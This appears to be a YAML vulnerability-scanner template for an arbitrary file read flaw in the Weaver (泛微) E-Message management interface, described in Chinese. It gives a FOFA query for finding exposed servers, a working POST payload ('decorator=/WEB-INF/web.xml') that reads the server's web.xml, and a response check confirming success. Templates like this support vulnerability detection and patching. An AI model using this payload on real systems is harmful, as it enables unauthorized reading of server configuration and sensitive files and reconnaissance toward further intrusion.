product: 泛微E-Message
vName: 泛微E-Message管理界面 任意文件读取(2023)
type: 文件读取
vID: [ ]
level: 3
vDesc: 泛微E-Message 管理界面存在任意文件读取漏洞隐患，攻击者可通过此漏洞获取敏感信息，为下一步攻击做准备。
version: ''
note: ''
search:
  FOFA: app="泛微-移动管理平台消息服务"
protocol: http
link: https://www.cnblogs.com/pursue-security/p/17775900.html
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /
      data: decorator=%2FWEB-INF%2Fweb.xml&confirm=true
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - <display-name>
            logic: and